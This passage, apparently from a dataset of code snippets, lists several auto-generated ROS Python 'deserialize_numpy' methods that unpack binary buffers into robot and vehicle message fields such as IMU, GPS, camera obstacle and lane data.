4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.userdata_remapping = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.userdata_remapping.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 6\n (_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion,) = _struct_B4bB.unpack(str[start:end])\n self.sbpl_wait_flag = bool(self.sbpl_wait_flag)\n self.start_P3DX_motion = bool(self.start_P3DX_motion)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 86\n (_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL,) = _get_struct_I3f2d13fH().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.dvl_error_code = str[start:end]\n _x = self\n start = end\n end += 73\n (_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ,) = _get_struct_B9f2i7f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actors = []\n for i in range(0, length):\n val1 = nesfr3_msgs.msg.Actor()\n _v25 = val1.header\n start = end\n end += 4\n (_v25.seq,) = _get_struct_I().unpack(str[start:end])\n _v26 = _v25.stamp\n _x = _v26\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v25.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v25.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (val1.tracking_id,) = _get_struct_I().unpack(str[start:end])\n _v27 = val1.pose\n _v28 = _v27.pose\n _v29 = _v28.position\n _x = _v29\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v30 = _v28.orientation\n _x = _v30\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 288\n _v27.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)\n val1.points = []\n for i in range(0, 18):\n val2 = nesfr3_msgs.msg.PointWithConfidence()\n _v31 = val2.point\n _x = _v31\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n val1.points.append(val2)\n _v32 = val1.nose_point\n _x = _v32\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.actors.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 56\n (_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration,) = _struct_7q.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.success,) = _struct_B.unpack(str[start:end])\n self.success = bool(self.success)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 36\n (_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z,) = _struct_9f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.canmsg = str[start:end].decode('utf-8')\n else:\n self.canmsg = str[start:end]\n _x = self\n start = end\n end += 30\n (_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate,) = _get_struct_Bf2B2f2B2fBf().unpack(str[start:end])\n self.track_group_changed = bool(self.track_group_changed)\n self.track_bridge_object = bool(self.track_bridge_object)\n self.track_rolling_count = bool(self.track_rolling_count)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags,) = _get_struct_I2di6h8fI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 16\n (_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel,) = _struct_4i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 12\n (_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8,) = _struct_12B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 24\n (_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered,) = _struct_3B4IH3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.nodes is None:\n self.nodes = None\n end = 0\n _x = self\n start = end\n end += 14\n (_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage,) = _get_struct_2B2If().unpack(str[start:end])\n start = end\n end += 12\n self.pos_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.eop_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.vel_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.angle_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 16\n self.quaternion = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=4)\n start = end\n end += 12\n self.imu_gyro_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 12\n self.imu_acc_3d = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.nodes = []\n for i in range(0, length):\n val1 = nlink_parser.msg.LinktrackNode2()\n _x = val1\n start = end\n end += 14\n (_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi,) = _get_struct_2B3f().unpack(str[start:end])\n self.nodes.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.Hlines is None:\n self.Hlines = None\n if self.Vlines is None:\n self.Vlines = None\n if self.regions is None:\n self.regions = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 4\n (_x.image_width, _x.image_height,) = _get_struct_2H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Hlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Hlines.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Vlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Vlines.append(val1)\n start = end\n end += 2\n (self.PFPS,) = _get_struct_H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.regions = []\n for i in range(0, length):\n val1 = cooperative_driving_vision.msg.Region()\n _v7 = val1.color\n _x = _v7\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n _v8 = val1.moment\n _x = _v8\n start = end\n end += 40\n (_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03,) = _get_struct_10f().unpack(str[start:end])\n self.regions.append(val1)\n _x = self\n start = end\n end += 4\n (_x.box_width, _x.box_height,) = _get_struct_2H().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.position is None:\n self.position = pcl_segment.msg.positionRPY()\n end = 0\n _x = self\n start = end\n end += 57\n (_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known,) = _get_struct_6d2IB().unpack(str[start:end])\n self.is_Known = bool(self.is_Known)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 142\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus,) = _get_struct_2i16dih().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno,) = _struct_14id2i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = None\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.camera_numobstacles, _x.camera.VehSpeed,) = _get_struct_id().unpack(str[start:end])\n self.camera_obj = []\n for i in range(0, 10):\n val1 = vehicle_msgs.msg.Camera_Obj()\n _v25 = val1.header\n start = end\n end += 4\n (_v25.seq,) = _get_struct_I().unpack(str[start:end])\n _v26 = _v25.stamp\n _x = _v26\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v25.frame_id = str[start:end].decode('utf-8')\n else:\n _v25.frame_id = str[start:end]\n start = end\n end += 4\n (val1.messageID,) = _get_struct_i().unpack(str[start:end])\n _v27 = val1.localStamp\n _v28 = _v27.header\n start = end\n end += 4\n (_v28.seq,) = _get_struct_I().unpack(str[start:end])\n _v29 = _v28.stamp\n _x = _v29\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v28.frame_id = str[start:end].decode('utf-8')\n else:\n _v28.frame_id = str[start:end]\n _x = _v27\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v27.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _v30 = val1.globalStamp\n _v31 = _v30.header\n start = end\n end += 4\n (_v31.seq,) = _get_struct_I().unpack(str[start:end])\n _v32 = _v31.stamp\n _x = _v32\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v31.frame_id = str[start:end].decode('utf-8')\n else:\n _v31.frame_id = str[start:end]\n _x = _v30\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v30.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = val1\n start = end\n end += 136\n (_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle,) = _get_struct_i2d6i3d3i2d2ididid().unpack(str[start:end])\n self.camera_obj.append(val1)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 404\n (_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version,) = 